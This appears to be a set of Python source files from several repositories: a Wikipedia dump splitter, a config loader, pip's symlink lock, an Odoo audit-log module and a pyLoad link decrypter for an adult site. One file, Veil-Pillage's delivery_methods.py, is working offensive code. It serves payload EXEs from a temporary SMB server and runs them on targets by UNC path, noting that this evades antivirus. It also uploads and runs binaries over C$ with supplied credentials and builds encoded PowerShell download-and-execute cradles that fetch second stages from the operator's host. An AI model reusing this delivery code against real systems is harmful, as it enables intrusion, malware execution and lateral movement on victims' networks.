if in_sequence:
if line.find(end_tag) >= 0:
output.write("\0")
in_sequence = False
else:
output.write(line)
else:
if line.find(start_tag) >= 0:
if output.tell() >= part_size:
output.close()
current_file += 1
output = open(partname + "." + str(current_file), "wb")
print "Writing part", output.name, "..."
in_sequence = True
sequences += 1
infile.close()
output.close()
print
print "Sequences: ", sequences
if __name__ == "__main__":
main()
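# Example invocation (hypothetical file name): split a wikipedia XML dump
# into ~64 MB parts, cutting on <page>...</page> elements, and write them
# out as part.1, part.2, ... in the current directory:
#
#     python split_wikipedia.py enwiki-pages-articles.xml 64 page
#
# Pass "-" as the input file to read the dump from stdin instead.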
|
AntoineLee/spider163 | refs/heads/master | spider163/utils/config.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ConfigParser
import os
import re
PATH = os.environ.get("HOME") + "/spider163"
if os.environ.get("SPIDER163_PATH") is not None:
PATH = os.environ.get("SPIDER163_PATH")
if not os.path.exists(PATH):
os.makedirs(PATH)
if not os.path.exists(PATH + "/spider163.conf"):
print("请在默认路径 " + PATH + " 下增加配置文件 spider.conf 格式参照官方")
os._exit(-1)
cf = ConfigParser.ConfigParser()
cf.read(PATH + "/spider163.conf")
def get_path():
return PATH
def get_db():
return cf.get("core", "db")
def get_mysql():
link = get_db()
db = re.search('(?<=/)[^/]+(?=\?)', link).group(0)
uri = re.search('.*(?=/)', link).group(0)
return {"db": db, "uri": uri}
def get_port():
return cf.get("core", "port")
|
ianmabie/uberpy | refs/heads/master | venv/lib/python2.7/site-packages/pip/_vendor/lockfile/symlinklockfile.py | 487 | from __future__ import absolute_import
import time
import os
from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout,
AlreadyLocked)
class SymlinkLockFile(LockBase):
"""Lock access to a file using symlink(2)."""
def __init__(self, path, threaded=True, timeout=None):
        # super(SymlinkLockFile, self).__init__(...)
LockBase.__init__(self, path, threaded, timeout)
# split it back!
self.unique_name = os.path.split(self.unique_name)[1]
def acquire(self, timeout=None):
# Hopefully unnecessary for symlink.
#try:
# open(self.unique_name, "wb").close()
#except IOError:
# raise LockFailed("failed to create %s" % self.unique_name)
        # use a conditional expression rather than "and/or" so an explicit
        # timeout of 0 (fail immediately) is not replaced by self.timeout
        timeout = timeout if timeout is not None else self.timeout
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
while True:
# Try and create a symbolic link to it.
try:
os.symlink(self.unique_name, self.lock_file)
except OSError:
# Link creation failed. Maybe we've double-locked?
if self.i_am_locking():
# Linked to out unique name. Proceed.
return
else:
# Otherwise the lock creation failed.
if timeout is not None and time.time() > end_time:
if timeout > 0:
raise LockTimeout("Timeout waiting to acquire"
" lock for %s" %
self.path)
else:
raise AlreadyLocked("%s is already locked" %
self.path)
time.sleep(timeout/10 if timeout is not None else 0.1)
else:
# Link creation succeeded. We're good to go.
return
def release(self):
if not self.is_locked():
raise NotLocked("%s is not locked" % self.path)
elif not self.i_am_locking():
raise NotMyLock("%s is locked, but not by me" % self.path)
os.unlink(self.lock_file)
def is_locked(self):
return os.path.islink(self.lock_file)
def i_am_locking(self):
return os.path.islink(self.lock_file) and \
os.readlink(self.lock_file) == self.unique_name
def break_lock(self):
if os.path.islink(self.lock_file): # exists && link
os.unlink(self.lock_file)
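# A minimal usage sketch (hypothetical path); the lock is a symlink named
# "<path>.lock" pointing at this process's unique name, which is how
# i_am_locking() tells our lock apart from another process's:
#
#     lock = SymlinkLockFile('/var/run/myapp.pid', timeout=10)
#     lock.acquire()   # raises LockTimeout after ~10s if contended
#     try:
#         pass         # ... critical section ...
#     finally:
#         lock.release()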
|
jorik041/Veil-Pillage | refs/heads/master | lib/delivery_methods.py | 4 | """
Payload-delivery methods.
Includes:
hostTrigger() - host an EXE and trigger it by UNC on a target
uploadTrigger() - upload and trigger and EXE
powershellTrigger() - trigger a download/execute of a powershell script from a particular powershell
powershellHostTrigger() - host a powershell script on a HTTP server and trigger a download/execute
"""
import os, time
from lib import helpers
from lib import smb
from lib import http
from lib import command_methods
import settings
def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""):
"""
Spins up an Impacket SMB server and hosts the binary specified by exePath.
The specified triggerMethod (default wmis) is then used to invoke a command
with the UNC path "\\localHost\\exe" which will invoke the specified
executable purely in memory.
Note: this evades several AV vendors, even with normally disk-detectable
executables #avlol :)
This takes 'targets' instead of a single 'target' since we don't want to set up
and tear down the local SMB server every time.
"""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# randomize the hosted .exe file name
hostedFileName = helpers.randomString() + ".exe"
# make the tmp hosting directory if it doesn't already exist
if not os.path.exists(settings.TEMP_DIR + "shared/"):
os.makedirs(settings.TEMP_DIR + "shared/")
# copy the payload to the random hostedFileName in the temp directory
os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/shared/" + hostedFileName)
# spin up the SMB server
server = smb.ThreadedSMBServer()
server.start()
time.sleep(.5)
# build the UNC path back to our host and executable and any specified arguments
cmd = "\\\\" + localHost + "\\system\\" + hostedFileName+" "+exeArgs
for target in targets:
# execute the UNC command for each target
command_methods.executeCommand(target, username, password, cmd, triggerMethod)
print helpers.color("\n [*] Giving time for commands to trigger...")
# sleep so the wmis/winexe commands can trigger and the target
# can grab the .exe from the SMB server
time.sleep(10)
# shut the smb server down
server.shutdown()
# remove the temporarily hosted files
os.system("rm -rf " + settings.TEMP_DIR+"/shared/")
    # not sure if we need to do this to kill off the smb server...
# os.kill(os.getpid(), signal.SIGINT) ?
    # return the randomized name in case the calling method later wants
# to clean the processes up
return hostedFileName
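# A minimal usage sketch (hypothetical hosts/credentials): host payload.exe
# on a temporary SMB server and trigger it in-memory on two targets via the
# default wmis method; the returned randomized name can be used later to
# kill the spawned process:
#
#     name = hostTrigger(["192.168.1.10", "192.168.1.11"], "admin",
#                        "Password1", "/root/payload.exe", "192.168.1.5")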
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
"""
Take a particular exe at "exePath" path and uploads it to each
target in targets, using the specified username and password.
The specified triggerMethod (default wmis) is then used to trigger the
uploaded executable.
"""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# randomize the uploaded .exe file name
uploadFileName = helpers.randomString() + ".exe"
# copy the payload to the random hostedFileName in the temp directory
os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName)
# command to trigger the uploaded executable
cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs
for target in targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5)
# execute the trigger command
command_methods.executeCommand(target, username, password, cmd, triggerMethod)
    # return the randomized name in case the calling method later wants
# to clean the processes up
return uploadFileName
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False):
"""
Trigger a specific url to download a powershell script from.
url - the full url (http/https) to download the second stage script from
scriptArguments - the arguments to pass to the script we're invoking
outFile - if you want to the script to output to a file for later retrieval, put a path here
noArch - don't do the arch-independent launcher
"""
# this surpasses the length-limit implicit to smbexec I'm afraid :(
if triggerMethod.lower() == "smbexec":
print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
raw_input(" [*] press any key to return: ")
return ""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# if the url doesn't start with http/https, assume http
if not url.lower().startswith("http"):
url = "http://" + url
if scriptArguments.lower() == "none": scriptArguments = ""
# powershell command to download/execute our secondary stage,
# plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
# for https, be sure to turn off warnings for self-signed certs in case we're hosting
if url.lower().startswith("https"):
downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
else:
downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
# get the encoded powershell command
triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)
# if we want to get output from the final execution, append it
if outFile: triggerCMD += " > " + outFile
# execute the powershell trigger command on each target
for target in targets:
print "\n [*] Executing command on "+target
out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
def powershellHostTrigger(targets, username, password, secondStage, lhost, scriptArguments="", triggerMethod="wmis", extraFiles=[], outFile=None, ssl=False, noArch=False):
"""
    Hosts the 'secondStage' powershell script on a temporary web server,
and triggers the "IEX (New-Object Net.WebClient).DownloadString(...)" cradle
to download and invoke the secondStage.
Inspiration from http://www.pentestgeek.com/2013/09/18/invoke-shellcode/
lhost - local host IP to trigger the secondary stage from
secondStage - path to a secondary Powershell payload stage
scriptArguments - additional powershell command to run right after the secondStage download
i.e. for PowerSploit arguments
extraFiles - additional files to host (i.e. an exe)
outFile - if you want to retrieve the results of the final execution
ssl - use https/ssl for the trigger
noArch - don't do the arch-independent launcher
    """
# this surpasses the length-limit implicit to smbexec I'm afraid :(
if triggerMethod.lower() == "smbexec":
print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
raw_input(" [*] press any key to return: ")
return ""
# sanity check that the second powershell stage actually exists
if not os.path.exists(secondStage):
print helpers.color("\n\n [!] Error: second powershell stage '"+secondStage+"' doesn't exist!", warning=True)
raw_input(" [*] press any key to return: ")
return ""
# translate string to boolean for ssl
if ssl and isinstance(ssl, str):
if ssl.lower()=="true": ssl = True
else: ssl = False
# get a randomized name for our second stage
secondStageName = helpers.randomString()
# if we're using ssl/https to host, throw in the self-signed cert
    # note: this also clears out the host directory, /tmp/pillage/ !
if ssl:
certPath = settings.VEIL_PILLAGE_PATH + "/data/misc/key.pem"
# create our Veil HTTPS server for serving /tmp/pillage/
server = http.VeilHTTPServer(port=443, cert=certPath)
# append https to the local host
url = "https://" + lhost + "/" + secondStageName
else:
# create our Veil HTTP server for serving /tmp/pillage/
server = http.VeilHTTPServer()
url = "http://" + lhost + "/" + secondStageName
# copy the second stage into the randomized name in /tmp/pillage/
os.system("cp " + secondStage + " /tmp/pillage/"+secondStageName)
# start the http server up
server.start()
time.sleep(.5)
# copy in any extra files to host (i.e. if we're doing remote reflective exe invocation or something)
for f in extraFiles:
        if not os.path.exists(f):
            print helpers.color(" [!] Error: additional file '"+f+"' doesn't exist!", warning=True)
else:
os.system("cp " + f + " /tmp/pillage/")
# call the general powershell trigger method with the appropriate url
powershellTrigger(targets, username, password, url, scriptArguments, triggerMethod, outFile, noArch)
# pause for a bit, and the shut the server down
print helpers.color("\n [*] Giving time for commands to trigger...")
time.sleep(10)
server.shutdown()
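# A minimal usage sketch (hypothetical hosts/credentials/paths): serve a
# PowerSploit script over HTTPS from this box, invoke it on the target, and
# redirect its output to a temp file for later retrieval:
#
#     powershellHostTrigger("192.168.1.10", "admin", "Password1",
#                           "/root/Invoke-Mimikatz.ps1", "192.168.1.5",
#                           scriptArguments="Invoke-Mimikatz",
#                           outFile="C:\\Windows\\Temp\\out.txt", ssl=True)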
|
lynndotconfig/server-tools | refs/heads/8.0 | auditlog/models/rule.py | 7 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 ABF OSIELL (<http://osiell.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, modules, _, SUPERUSER_ID, sql_db
FIELDS_BLACKLIST = [
'id', 'create_uid', 'create_date', 'write_uid', 'write_date',
'display_name', '__last_update',
]
# Used for performance, to avoid a dictionary instantiation when we need an
# empty dict to simplify algorithms
EMPTY_DICT = {}
class DictDiffer(object):
"""Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current = set(current_dict)
self.set_past = set(past_dict)
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect
if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect
if self.past_dict[o] == self.current_dict[o])
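# A quick illustrative sketch (not part of the original module) of how
# DictDiffer behaves on two record snapshots, as used below for 'write' logs:
#
#   >>> past = {'name': 'Foo', 'state': 'draft', 'user_id': 1}
#   >>> current = {'name': 'Foo', 'state': 'subscribed', 'color': 2}
#   >>> diff = DictDiffer(current, past)
#   >>> sorted(diff.added()), sorted(diff.removed())
#   (['color'], ['user_id'])
#   >>> sorted(diff.changed()), sorted(diff.unchanged())
#   (['state'], ['name'])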
class auditlog_rule(models.Model):
_name = 'auditlog.rule'
_description = "Auditlog - Rule"
name = fields.Char(u"Name", size=32, required=True)
model_id = fields.Many2one(
'ir.model', u"Model", required=True,
help=u"Select model for which you want to generate log.")
user_ids = fields.Many2many(
'res.users',
'audittail_rules_users',
'user_id', 'rule_id',
string=u"Users",
help=u"if User is not added then it will applicable for all users")
log_read = fields.Boolean(
u"Log Reads",
help=(u"Select this if you want to keep track of read/open on any "
u"record of the model of this rule"))
log_write = fields.Boolean(
u"Log Writes", default=True,
help=(u"Select this if you want to keep track of modification on any "
u"record of the model of this rule"))
log_unlink = fields.Boolean(
u"Log Deletes", default=True,
help=(u"Select this if you want to keep track of deletion on any "
u"record of the model of this rule"))
log_create = fields.Boolean(
u"Log Creates", default=True,
help=(u"Select this if you want to keep track of creation on any "
u"record of the model of this rule"))
# log_action = fields.Boolean(
# "Log Action",
# help=("Select this if you want to keep track of actions on the "
# "model of this rule"))
# log_workflow = fields.Boolean(
# "Log Workflow",
# help=("Select this if you want to keep track of workflow on any "
# "record of the model of this rule"))
state = fields.Selection(
[('draft', "Draft"), ('subscribed', "Subscribed")],
string=u"State", required=True, default='draft')
action_id = fields.Many2one(
'ir.actions.act_window', string="Action")
_sql_constraints = [
('model_uniq', 'unique(model_id)',
("There is already a rule defined on this model\n"
"You cannot define another: please edit the existing one."))
]
def _register_hook(self, cr, ids=None):
"""Get all rules and apply them to log method calls."""
super(auditlog_rule, self)._register_hook(cr)
if not hasattr(self.pool, '_auditlog_field_cache'):
self.pool._auditlog_field_cache = {}
if not hasattr(self.pool, '_auditlog_model_cache'):
self.pool._auditlog_model_cache = {}
if ids is None:
ids = self.search(cr, SUPERUSER_ID, [('state', '=', 'subscribed')])
return self._patch_methods(cr, SUPERUSER_ID, ids)
@api.multi
def _patch_methods(self):
"""Patch ORM methods of models defined in rules to log their calls."""
updated = False
model_cache = self.pool._auditlog_model_cache
for rule in self:
if rule.state != 'subscribed':
continue
if not self.pool.get(rule.model_id.model):
# ignore rules for models not loadable currently
continue
model_cache[rule.model_id.model] = rule.model_id.id
model_model = self.env[rule.model_id.model]
# CRUD
# -> create
check_attr = 'auditlog_ruled_create'
if getattr(rule, 'log_create') \
and not hasattr(model_model, check_attr):
model_model._patch_method('create', self._make_create())
setattr(model_model, check_attr, True)
updated = True
# -> read
check_attr = 'auditlog_ruled_read'
if getattr(rule, 'log_read') \
and not hasattr(model_model, check_attr):
model_model._patch_method('read', self._make_read())
setattr(model_model, check_attr, True)
updated = True
# -> write
check_attr = 'auditlog_ruled_write'
if getattr(rule, 'log_write') \
and not hasattr(model_model, check_attr):
model_model._patch_method('write', self._make_write())
setattr(model_model, check_attr, True)
updated = True
# -> unlink
check_attr = 'auditlog_ruled_unlink'
if getattr(rule, 'log_unlink') \
and not hasattr(model_model, check_attr):
model_model._patch_method('unlink', self._make_unlink())
setattr(model_model, check_attr, True)
updated = True
return updated
@api.multi
def _revert_methods(self):
"""Restore original ORM methods of models defined in rules."""
updated = False
for rule in self:
model_model = self.env[rule.model_id.model]
for method in ['create', 'read', 'write', 'unlink']:
if getattr(rule, 'log_%s' % method) and hasattr(
getattr(model_model, method), 'origin'):
model_model._revert_method(method)
updated = True
if updated:
modules.registry.RegistryManager.signal_registry_change(
self.env.cr.dbname)
    # Unable to find a way to declare the `create` method with the new API,
    # errors occur with the `_register_hook()` BaseModel method.
def create(self, cr, uid, vals, context=None):
"""Update the registry when a new rule is created."""
res_id = super(auditlog_rule, self).create(
cr, uid, vals, context=context)
if self._register_hook(cr, [res_id]):
modules.registry.RegistryManager.signal_registry_change(cr.dbname)
return res_id
    # Unable to find a way to declare the `write` method with the new API,
    # errors occur with the `_register_hook()` BaseModel method.
def write(self, cr, uid, ids, vals, context=None):
"""Update the registry when existing rules are updated."""
if isinstance(ids, (int, long)):
ids = [ids]
super(auditlog_rule, self).write(cr, uid, ids, vals, context=context)
if self._register_hook(cr, ids):
modules.registry.RegistryManager.signal_registry_change(cr.dbname)
return True
@api.multi
def unlink(self):
"""Unsubscribe rules before removing them."""
self.unsubscribe()
return super(auditlog_rule, self).unlink()
def _make_create(self):
"""Instanciate a create method that log its calls."""
@api.model
@api.returns('self', lambda value: value.id)
def create(self, vals, **kwargs):
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
new_record = create.origin(self, vals, **kwargs)
new_values = dict(
(d['id'], d) for d in new_record.sudo().read(
list(self._fields)))
rule_model.sudo().create_logs(
self.env.uid, self._name, new_record.ids,
'create', None, new_values)
return new_record
return create
def _make_read(self):
"""Instanciate a read method that log its calls."""
def read(self, *args, **kwargs):
result = read.origin(self, *args, **kwargs)
# Sometimes the result is not a list but a dictionary
# Also, we can not modify the current result as it will break calls
result2 = result
if not isinstance(result2, list):
result2 = [result]
read_values = dict((d['id'], d) for d in result2)
# Old API
if args and isinstance(args[0], sql_db.Cursor):
cr, uid, ids = args[0], args[1], args[2]
if isinstance(ids, (int, long)):
ids = [ids]
# If the call came from auditlog itself, skip logging:
# avoid logs on `read` produced by auditlog during internal
# processing: read data of relevant records, 'ir.model',
# 'ir.model.fields'... (no interest in logging such operations)
if kwargs.get('context', {}).get('auditlog_disabled'):
return result
env = api.Environment(cr, uid, {'auditlog_disabled': True})
rule_model = env['auditlog.rule']
rule_model.sudo().create_logs(
env.uid, self._name, ids,
'read', read_values)
# New API
else:
# If the call came from auditlog itself, skip logging:
# avoid logs on `read` produced by auditlog during internal
# processing: read data of relevant records, 'ir.model',
# 'ir.model.fields'... (no interest in logging such operations)
if self.env.context.get('auditlog_disabled'):
return result
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
rule_model.sudo().create_logs(
self.env.uid, self._name, self.ids,
'read', read_values)
return result
return read
def _make_write(self):
"""Instanciate a write method that log its calls."""
@api.multi
def write(self, vals, **kwargs):
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
old_values = dict(
(d['id'], d) for d in self.sudo().read(list(self._fields)))
result = write.origin(self, vals, **kwargs)
new_values = dict(
(d['id'], d) for d in self.sudo().read(list(self._fields)))
rule_model.sudo().create_logs(
self.env.uid, self._name, self.ids,
'write', old_values, new_values)
return result
return write
def _make_unlink(self):
"""Instanciate an unlink method that log its calls."""
@api.multi
def unlink(self, **kwargs):
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
old_values = dict(
(d['id'], d) for d in self.sudo().read(list(self._fields)))
rule_model.sudo().create_logs(
self.env.uid, self._name, self.ids, 'unlink', old_values)
return unlink.origin(self, **kwargs)
return unlink
def create_logs(self, uid, res_model, res_ids, method,
old_values=None, new_values=None,
additional_log_values=None):
"""Create logs. `old_values` and `new_values` are dictionnaries, e.g:
{RES_ID: {'FIELD': VALUE, ...}}
"""
if old_values is None:
old_values = EMPTY_DICT
if new_values is None:
new_values = EMPTY_DICT
log_model = self.env['auditlog.log']
for res_id in res_ids:
model_model = self.env[res_model]
name = model_model.browse(res_id).name_get()
res_name = name and name[0] and name[0][1]
vals = {
'name': res_name,
'model_id': self.pool._auditlog_model_cache[res_model],
'res_id': res_id,
'method': method,
'user_id': uid,
}
vals.update(additional_log_values or {})
log = log_model.create(vals)
diff = DictDiffer(
new_values.get(res_id, EMPTY_DICT),
old_values.get(res_id, EMPTY_DICT))
            if method == 'create':
                self._create_log_line_on_create(log, diff.added(), new_values)
            elif method == 'read':
                self._create_log_line_on_read(
                    log, old_values.get(res_id, EMPTY_DICT).keys(), old_values)
            elif method == 'write':
self._create_log_line_on_write(
log, diff.changed(), old_values, new_values)
def _get_field(self, model, field_name):
cache = self.pool._auditlog_field_cache
if field_name not in cache.get(model.model, {}):
cache.setdefault(model.model, {})
# - we use 'search()' then 'read()' instead of the 'search_read()'
# to take advantage of the 'classic_write' loading
# - search the field in the current model and those it inherits
field_model = self.env['ir.model.fields']
all_model_ids = [model.id]
all_model_ids.extend(model.inherited_model_ids.ids)
field = field_model.search(
[('model_id', 'in', all_model_ids), ('name', '=', field_name)])
# The field can be a dummy one, like 'in_group_X' on 'res.users'
# As such we can't log it (field_id is required to create a log)
if not field:
cache[model.model][field_name] = False
else:
field_data = field.read(load='_classic_write')[0]
cache[model.model][field_name] = field_data
return cache[model.model][field_name]
def _create_log_line_on_read(
self, log, fields_list, read_values):
"""Log field filled on a 'read' operation."""
log_line_model = self.env['auditlog.log.line']
for field_name in fields_list:
if field_name in FIELDS_BLACKLIST:
continue
field = self._get_field(log.model_id, field_name)
            # not all fields have an ir.model.fields entry (e.g. related fields)
if field:
log_vals = self._prepare_log_line_vals_on_read(
log, field, read_values)
log_line_model.create(log_vals)
def _prepare_log_line_vals_on_read(self, log, field, read_values):
"""Prepare the dictionary of values used to create a log line on a
'read' operation.
"""
vals = {
'field_id': field['id'],
'log_id': log.id,
'old_value': read_values[log.res_id][field['name']],
'old_value_text': read_values[log.res_id][field['name']],
'new_value': False,
'new_value_text': False,
}
if field['relation'] and '2many' in field['ttype']:
old_value_text = self.env[field['relation']].browse(
vals['old_value']).name_get()
vals['old_value_text'] = old_value_text
return vals
def _create_log_line_on_write(
self, log, fields_list, old_values, new_values):
"""Log field updated on a 'write' operation."""
log_line_model = self.env['auditlog.log.line']
for field_name in fields_list:
if field_name in FIELDS_BLACKLIST:
continue
field = self._get_field(log.model_id, field_name)
            # not all fields have an ir.model.fields entry (e.g. related fields)
if field:
log_vals = self._prepare_log_line_vals_on_write(
log, field, old_values, new_values)
log_line_model.create(log_vals)
def _prepare_log_line_vals_on_write(
self, log, field, old_values, new_values):
"""Prepare the dictionary of values used to create a log line on a
'write' operation.
"""
vals = {
'field_id': field['id'],
'log_id': log.id,
'old_value': old_values[log.res_id][field['name']],
'old_value_text': old_values[log.res_id][field['name']],
'new_value': new_values[log.res_id][field['name']],
'new_value_text': new_values[log.res_id][field['name']],
}
# for *2many fields, log the name_get
if field['relation'] and '2many' in field['ttype']:
# Filter IDs to prevent a 'name_get()' call on deleted resources
existing_ids = self.env[field['relation']]._search(
[('id', 'in', vals['old_value'])])
old_value_text = []
if existing_ids:
existing_values = self.env[field['relation']].browse(
existing_ids).name_get()
old_value_text.extend(existing_values)
# Deleted resources will have a 'DELETED' text representation
deleted_ids = set(vals['old_value']) - set(existing_ids)
for deleted_id in deleted_ids:
old_value_text.append((deleted_id, 'DELETED'))
vals['old_value_text'] = old_value_text
new_value_text = self.env[field['relation']].browse(
vals['new_value']).name_get()
vals['new_value_text'] = new_value_text
return vals
def _create_log_line_on_create(
self, log, fields_list, new_values):
"""Log field filled on a 'create' operation."""
log_line_model = self.env['auditlog.log.line']
for field_name in fields_list:
if field_name in FIELDS_BLACKLIST:
continue
field = self._get_field(log.model_id, field_name)
            # not all fields have an ir.model.fields entry (e.g. related fields)
if field:
log_vals = self._prepare_log_line_vals_on_create(
log, field, new_values)
log_line_model.create(log_vals)
def _prepare_log_line_vals_on_create(self, log, field, new_values):
"""Prepare the dictionary of values used to create a log line on a
'create' operation.
"""
vals = {
'field_id': field['id'],
'log_id': log.id,
'old_value': False,
'old_value_text': False,
'new_value': new_values[log.res_id][field['name']],
'new_value_text': new_values[log.res_id][field['name']],
}
if field['relation'] and '2many' in field['ttype']:
new_value_text = self.env[field['relation']].browse(
vals['new_value']).name_get()
vals['new_value_text'] = new_value_text
return vals
@api.multi
def subscribe(self):
"""Subscribe Rule for auditing changes on model and apply shortcut
to view logs on that model.
"""
act_window_model = self.env['ir.actions.act_window']
model_data_model = self.env['ir.model.data']
for rule in self:
# Create a shortcut to view logs
domain = "[('model_id', '=', %s), ('res_id', '=', active_id)]" % (
rule.model_id.id)
vals = {
'name': _(u"View logs"),
'res_model': 'auditlog.log',
'src_model': rule.model_id.model,
'domain': domain,
}
act_window = act_window_model.sudo().create(vals)
rule.write({'state': 'subscribed', 'action_id': act_window.id})
keyword = 'client_action_relate'
value = 'ir.actions.act_window,%s' % act_window.id
model_data_model.sudo().ir_set(
'action', keyword, 'View_log_' + rule.model_id.model,
[rule.model_id.model], value, replace=True,
isobject=True, xml_id=False)
return True
@api.multi
def unsubscribe(self):
"""Unsubscribe Auditing Rule on model."""
act_window_model = self.env['ir.actions.act_window']
ir_values_model = self.env['ir.values']
# Revert patched methods
self._revert_methods()
for rule in self:
# Remove the shortcut to view logs
act_window = act_window_model.search(
                # must match the name given in subscribe() ("View logs")
                [('name', '=', 'View logs'),
('res_model', '=', 'auditlog.log'),
('src_model', '=', rule.model_id.model)])
if act_window:
value = 'ir.actions.act_window,%s' % act_window.id
act_window.unlink()
ir_value = ir_values_model.search(
[('model', '=', rule.model_id.model),
('value', '=', value)])
if ir_value:
ir_value.unlink()
self.write({'state': 'draft'})
return True
|
synweap15/pyload | refs/heads/stable | module/plugins/crypter/SexuriaCom.py | 11 | # -*- coding: utf-8 -*-
import re
from module.plugins.internal.Crypter import Crypter
class SexuriaCom(Crypter):
__name__ = "SexuriaCom"
__type__ = "crypter"
__version__ = "0.10"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?sexuria\.com/(v1/)?(Pornos_Kostenlos_.+?_(\d+)\.html|dl_links_\d+_\d+\.html|id=\d+\&part=\d+\&link=\d+)'
__config__ = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_package", "bool", "Create a subfolder for each package", True)]
__description__ = """Sexuria.com decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("NETHead", "NETHead.AT.gmx.DOT.net")]
#: Constants
PATTERN_SUPPORTED_MAIN = r'http://(www\.)?sexuria\.com/(v1/)?Pornos_Kostenlos_.+?_(\d+)\.html'
PATTERN_SUPPORTED_CRYPT = r'http://(www\.)?sexuria\.com/(v1/)?dl_links_\d+_(?P<ID>\d+)\.html'
PATTERN_SUPPORTED_REDIRECT = r'http://(www\.)?sexuria\.com/out\.php\?id=(?P<ID>\d+)\&part=\d+\&link=\d+'
PATTERN_TITLE = r'<title> - (?P<TITLE>.*) Sexuria - Kostenlose Pornos - Rapidshare XXX Porn</title>'
PATTERN_PASSWORD = r'<strong>Passwort: </strong></div></td>.*?bgcolor="#EFEFEF">(?P<PWD>.*?)</td>'
PATTERN_DL_LINK_PAGE = r'"(dl_links_\d+_\d+\.html)"'
PATTERN_REDIRECT_LINKS = r'value="(http://sexuria\.com/out\.php\?id=\d+\&part=\d+\&link=\d+)" readonly'
LIST_PWDIGNORE = ["Kein Passwort", "-"]
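    # Illustrative URL shapes (hypothetical IDs) accepted by the patterns above:
    #   PATTERN_SUPPORTED_MAIN     -> http://sexuria.com/v1/Pornos_Kostenlos_foo_123.html
    #   PATTERN_SUPPORTED_CRYPT    -> http://sexuria.com/v1/dl_links_123_456.html
    #   PATTERN_SUPPORTED_REDIRECT -> http://sexuria.com/out.php?id=123&part=1&link=1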
def decrypt(self, pyfile):
#: Init
self.pyfile = pyfile
self.package = pyfile.package()
#: Decrypt and add links
package_name, self.links, folder_name, package_pwd = self.decrypt_links(self.pyfile.url)
if package_pwd:
self.pyfile.package().password = package_pwd
self.packages = [(package_name, self.links, folder_name)]
def decrypt_links(self, url):
linklist = []
name = self.package.name
folder = self.package.folder
password = None
if re.match(self.PATTERN_SUPPORTED_MAIN, url, re.I):
#: Processing main page
html = self.load(url)
links = re.findall(self.PATTERN_DL_LINK_PAGE, html, re.I)
for link in links:
linklist.append("http://sexuria.com/v1/" + link)
elif re.match(self.PATTERN_SUPPORTED_REDIRECT, url, re.I):
#: Processing direct redirect link (out.php), redirecting to main page
id = re.search(self.PATTERN_SUPPORTED_REDIRECT, url, re.I).group('ID')
if id:
linklist.append("http://sexuria.com/v1/Pornos_Kostenlos_liebe_%s.html" % id)
elif re.match(self.PATTERN_SUPPORTED_CRYPT, url, re.I):
#: Extract info from main file
id = re.search(self.PATTERN_SUPPORTED_CRYPT, url, re.I).group('ID')
html = self.load("http://sexuria.com/v1/Pornos_Kostenlos_info_%s.html" % id)
#: Webpage title / Package name
titledata = re.search(self.PATTERN_TITLE, html, re.I)
if not titledata:
self.log_warning("No title data found, has site changed?")
else:
title = titledata.group('TITLE').strip()
if title:
name = folder = title
self.log_debug("Package info found, name [%s] and folder [%s]" % (name, folder))
#: Password
pwddata = re.search(self.PATTERN_PASSWORD, html, re.I | re.S)
if not pwddata:
self.log_warning("No password data found, has site changed?")
else:
pwd = pwddata.group('PWD').strip()
if pwd and not (pwd in self.LIST_PWDIGNORE):
password = pwd
self.log_debug("Package info found, password [%s]" % password)
#: Process links (dl_link)
html = self.load(url)
links = re.findall(self.PATTERN_REDIRECT_LINKS, html, re.I)
            if not links:
                self.log_error(_("Broken for link: %s") % url)
else:
for link in links:
link = link.replace("http://sexuria.com/", "http://www.sexuria.com/")
finallink = self.load(link, just_header=True)['location']
